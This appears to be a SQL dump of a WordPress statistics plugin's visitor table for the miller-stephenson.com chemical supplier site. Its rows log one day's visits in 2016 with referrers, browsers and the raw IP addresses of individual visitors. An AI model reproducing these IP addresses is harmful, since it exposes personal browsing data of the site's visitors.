INSERT INTO `wp_statistics_visitor` VALUES (282, '2016-10-05', 'https://www.miller-stephenson.com/product/fluoropolymer-coatings/', 'MSIE', 'Windows', '9.0', '', '204.79.180.88', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (283, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (284, '2016-10-05', 'https://iqbazar.ru/', 'MSIE', 'Windows', '2.0', '', '178.137.84.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (285, '2016-10-05', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '108.51.148.188', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (286, '2016-10-05', 'https://www.google.ch/', 'Safari', 'iPad', '7.0', '', '85.90.1.9', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (287, '2016-10-05', 'https://www.mosrif.ru/', 'MSIE', 'Windows', '5.5', '', '134.249.65.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (288, '2016-10-05', 'https://www.miller-stephenson.com', 'Dalvik', 'Android', '2.1.0', '', '70.214.68.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (289, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/specialty-products/', 'MSIE', 'Windows', '9.0', '', '204.79.180.233', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (290, '2016-10-05', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.116', '', '122.170.19.156', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (291, '2016-10-05', 'https://www.google.ro/', 'Chrome', 'Linux', '53.0.2785.92', '', '109.103.60.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (292, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.5.6', '', '78.85.151.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (293, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '183.82.113.191', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (294, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '27.0.1453', '', '10.191.169.69', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (295, '2016-10-05', 'https://www.miller-stephenson.com/', 'Chrome', 'Android', '27.0.1453', '', '65.57.245.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (296, '2016-10-05', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '183.82.113.191', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (297, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&ved=0ahUKEwj5u7PMz8PPAhXDXR4KHf00CdEQFggjMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-122AD.pdf&usg=AFQjCNEHYvrBDicFr_0ThYtNVdYZMxT3lA', 'MSIE', 'Windows', '10.0', '', '12.219.61.240', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (298, '2016-10-05', 'https://www.google.com', 'Firefox', 'Windows', '36.0', '', '54.84.136.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (299, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '41.0.2309.93', '', '83.217.27.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (300, '2016-10-05', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '73.243.91.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (301, '2016-10-05', 'https://www.google.com.br/', 'Chrome', 'Windows', '53.0.2785.143', '', '186.220.13.194', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (302, '2016-10-05', 'https://www.miller-stephenson.com/ptfe-release-agent/', 'MSIE', 'Windows', '9.0', '', '182.118.20.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (303, '2016-10-05', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 46, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (304, '2016-10-05', 'https://www.google.com/aclk?sa=L&ai=DChcSEwif-c-Q1cPPAhUrDHMKHUPzCucYABAA&ei=B_L0V7vICYmtsAH02KvoCw&sig=AOD64_05W6l-rHI7hIdBL_OgzqJLs5wsZw&rct=j&q=&sqi=2&ved=0ahUKEwj757aQ1cPPAhWJFiwKHXTsCr0Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '216.24.89.58', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (305, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '104.131.107.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (306, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '104.131.107.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (307, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.131', '', '104.131.107.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (308, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '34.0.1847.131', '', '104.131.107.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (309, '2016-10-05', 'https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent', 'Firefox', 'Windows', '29.0', '', '104.131.107.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (310, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '44.0.2403.133', '', '66.87.139.59', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (311, '2016-10-05', 'https://www.google.es/', 'Chrome', 'Android', '53.0.2785.124', '', '87.223.96.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (312, '2016-10-05', 'https://www.miller-stephenson.com/product/xp-2a1/', 'Firefox', 'Windows', '49.0', '', '50.167.97.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (313, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 279, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (314, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (315, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '208.89.140.11', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (316, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.241.222.84', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (317, '2016-10-05', 'https://www.miller-stephenson.com', 'Dalvik', 'Android', '2.1.0', '', '198.21.250.242', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (318, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.113', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (319, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.85', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (320, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.81.105.129', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (321, '2016-10-05', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjHyLDZ18PPAhVMPYEKHdTwDIEYABAB&sig=AOD64_0U7u40GQ-FkiPV--te3cSLo2b8BA&rct=j&q=&ved=0ahUKEwj3ha3Z18PPAhVCWSYKHZ5HCTUQ0QwIWw&adurl=', 'MSIE', 'Windows', '11.0', '', '144.58.115.179', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (322, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (323, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (324, '2016-10-05', 'https://www.google.com/', 'Edge', 'Windows', '13.10586', '', '64.128.53.82', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (325, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '185.69.233.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (326, '2016-10-05', 'https://r.search.yahoo.com/_ylt=A0LEV0Gi9vRXmhQADFxXNyoA;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1475700514/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fms-122se%2f/RK=0/RS=VotI1tOa8ORStZpFhYxuin.Y6H4-', 'MSIE', 'Windows', '9.0', '', '152.179.109.178', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (327, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '195.154.250.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (328, '2016-10-05', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '174.144.113.224', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (329, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '131.142.190.78', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (330, '2016-10-05', 'https://search.yahoo.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '10.26.7.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (331, '2016-10-05', 'https://www.google.co.za/', 'Chrome', 'Windows', '53.0.2785.116', '', '192.168.57.30', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (332, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.77.8.245', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (333, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '168.62.226.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (334, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '98.194.27.130', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (335, '2016-10-05', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '11.50', '', '54.197.19.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (336, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '210.134.165.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (337, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '98.187.248.100', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (338, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwiXif-W3sPPAhXL1IMKHZ_PCsQQFggpMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-122AD.pdf&usg=AFQjCNEHYvrBDicFr_0ThYtNVdYZMxT3lA&sig2=rSbt0-HGkEmKz5uzRnRX9g', 'MSIE', 'Windows', '11.0', '', '65.208.50.250', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (339, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '173.201.196.107', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (340, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.116', '', '67.14.255.190', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (341, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '37.247.108.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (342, '2016-10-05', 'https://www.google.com', 'Firefox', 'Windows', '33.0', '', '54.174.248.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (343, '2016-10-05', 'https://www.miller-stephenson.com/quik-freeze/', 'MSIE', 'Windows', '9.0', '', '182.118.25.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (344, '2016-10-05', 'https://www.miller-stephenson.com/quik-freeze/', 'MSIE', 'Windows', '9.0', '', '182.118.25.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (345, '2016-10-05', 'https://www.google.com.tr/', 'Chrome', 'Windows', '53.0.2785.143', '', '85.107.194.156', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (346, '2016-10-05', 'https://www.google.es/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiFtsXO4sPPAhWFrB4KHVC-AD4QFggjMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-475C%2C%2520477C.pdf&usg=AFQjCNGsXGFcFGMdZgV27Rf39t3ZMEaEyQ', 'MSIE', 'Windows', '11.0', '', '213.27.171.12', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (347, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '66.11.4.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (348, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.11.4.30', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (349, '2016-10-05', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '189.89.125.52', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (350, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '107.0.69.23', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (351, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (352, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (353, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.140', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (354, '2016-10-05', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwjesLOR5MPPAhULkGkKHdgjBQ0YABAH&sig=AOD64_0ah5TsWJXgru-ZrTgvbwgEag40fw&rct=j&q=&ved=0ahUKEwiv8qSR5MPPAhVK8IMKHTcaD9EQ0QwILw&adurl=', 'MSIE', 'Windows', '11.0', '', '67.69.3.131', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (355, '2016-10-05', 'https://www.privatefx-in.ru/', 'Opera', 'Windows', '8.01', '', '178.137.82.226', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (356, '2016-10-05', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '98.194.104.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (357, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwju2_zG5cPPAhXpy4MKHd1WDO4QFghHMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-750%2C%2520752.pdf&usg=AFQjCNHltHLN6m1eOcSeQj-60KcJjV9izA&bvm=bv.134495766,d.amc', 'MSIE', 'Windows', '11.0', '', '12.146.208.50', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (358, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (359, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '197.210.24.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (360, '2016-10-05', 'https://www.miller-stephenson.com/category/opteon-articles/', 'Chrome', 'Windows', '21.0.1180.89', '', '101.226.166.224', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (361, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.99.148.215', '000', 57, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (362, '2016-10-05', 'https://www.google.co.in/', 'Chrome', 'Windows', '43.0.2357.134', '', '120.88.178.105', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (363, '2016-10-05', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '174.199.8.55', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (364, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (365, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (366, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjU0rmJ68PPAhVGej4KHUl8AQAQFggkMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '65.222.251.100', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (367, '2016-10-05', 'https://www.google.com', 'Firefox', 'Linux', '38.0', '', '149.37.1.250', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (368, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjTv52A7MPPAhUBTyYKHeX6AasQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.134495766,d.eWE', 'MSIE', 'Windows', '11.0', '', '70.89.1.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (369, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.91.236.242', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (370, '2016-10-05', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '50.151.36.144', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (371, '2016-10-05', 'https://www.google.com/', 'Edge', 'Windows', '13.10586', '', '208.180.109.18', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (372, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '150.70.188.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (373, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwiSlo2F7sPPAhUH6oMKHb78C7kQFggoMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FCuring%2520Agent.pdf&usg=AFQjCNHxwVqX5A1fMEHEn-MeptfpRg-BrQ', 'MSIE', 'Windows', '11.0', '', '74.142.10.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (374, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '207.223.116.5', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (375, '2016-10-05', 'https://www.bing.com/search?q=miller-stephenson+chemical+co&form=IE11TR&src=IE11TR&pc=DCJB', 'MSIE', 'Windows', '10.0', '', '199.241.14.252', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (376, '2016-10-05', 'https://www.google.dk/', 'Chrome', 'Windows', '53.0.2785.143', '', '80.62.117.80', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (377, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '70.60.57.220', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (378, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.218', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (379, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '73.216.100.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (380, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '198.175.154.212', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (381, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (382, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi1gMzq8sPPAhUBVSYKHZVOAM4QFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-122AD.pdf&usg=AFQjCNEHYvrBDicFr_0ThYtNVdYZMxT3lA&bvm=bv.134495766,d.eWE', 'MSIE', 'Windows', '11.0', '', '132.89.254.2', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (383, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.69.22.56', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (384, '2016-10-05', 'https://www.google.it/', 'Chrome', 'Windows', '53.0.2785.143', '', '159.149.97.28', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (385, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '27.0.1453.93', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (386, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwiQg-Th9MPPAhXGQCYKHVOxCVEQFggiMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-381HC%2C%2520383H.pdf&usg=AFQjCNGPTNO91by-BJTZeMCiGX48f23kYg&bvm=bv.134495766,d.eWE', 'MSIE', 'Windows', '11.0', '', '135.245.48.73', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (387, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '76.186.230.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (388, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.53.133.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (389, '2016-10-05', 'https://www.google.co.uk/', 'Chrome', 'Android', '53.0.2785.124', '', '10.71.14.84', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (390, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '39.0.2171.99', '', '66.249.79.157', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (391, '2016-10-05', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '72.76.243.111', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (392, '2016-10-05', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '73.175.9.94', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (393, '2016-10-05', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.143', '', '185.62.156.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (394, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '36.55.235.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (395, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '68.47.243.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (396, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '1.82.184.69', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (397, '2016-10-05', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwip--zi-sPPAhWBZj4KHW0qAAMQFghJMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-88%2F&usg=AFQjCNHSpyGWW5ApiVkkCFINGDiXS5h3Cg&sig2=1d_ibwd46ljmq-aKstVXEQ', 'MSIE', 'Windows', '11.0', '', '206.167.137.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (398, '2016-10-05', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '64.211.6.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (399, '2016-10-05', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '98.158.87.105', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (400, '2016-10-05', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj32_nG_MPPAhVEA3MKHSC9DOYYABAD&sig=AOD64_2-WHGPaSf7MypepLgdTLW3-C7n6Q&ctype=4&rct=j&q=&ved=0ahUKEwjL-fLG_MPPAhUIZCwKHfBJAdYQwgUIISgC&adurl=', 'MSIE', 'Windows', '11.0', '', '199.181.152.201', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (401, '2016-10-05', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjM5sbo_MPPAhVGG4EKHcTrDdQYABAA&sig=AOD64_27Y6liWCWEOa4B9iH78B4zQrBKUQ&rct=j&q=&ved=0ahUKEwik_MLo_MPPAhVIbiYKHZdeBl0Q0QwIXw&adurl=', 'MSIE', 'Windows', '11.0', '', '132.3.33.81', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (402, '2016-10-05', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjM5sbo_MPPAhVGG4EKHcTrDdQYABAA&sig=AOD64_27Y6liWCWEOa4B9iH78B4zQrBKUQ&rct=j&q=&ved=0ahUKEwik_MLo_MPPAhVIbiYKHZdeBl0Q0QwIXw&adurl=', 'MSIE', 'Windows', '11.0', '', '132.3.33.79', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (403, '2016-10-05', 'https://www.miller-stephenson.com/notify-SubZero?aHR0cDovL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb20v;qlsfOb0ayouq2atvFEVFwc8WDoAPyrsHbrL32AvXK6U=', 'MSIE', 'Windows', '11.0', '', '132.3.33.80', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (404, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/epoxy-resin-systems/', 'MSIE', 'Windows', '11.0', '', '132.3.33.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (405, '2016-10-05', 'https://www.google.co.kr/', 'Chrome', 'Windows', '53.0.2785.143', '', '112.154.35.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (406, '2016-10-05', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.1', '', '72.229.205.119', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (407, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '71.162.5.64', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (408, '2016-10-05', 'https://mmk.mschem.com/miller/pdf/MS-907.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '67.222.211.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (409, '2016-10-05', 'https://www.google.com/url?url=https://www.miller-stephenson.com/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwiZ0uz__8PPAhXMPiYKHcWwAVMQFggVMAA&usg=AFQjCNHVMV3tSuqMIrrBe8ycLmdO3Xacdw', 'MSIE', 'Windows', '9.0', '', '75.99.5.194', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (410, '2016-10-05', 'https://www.bing.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.224.222.16', '000', 21, 0); 
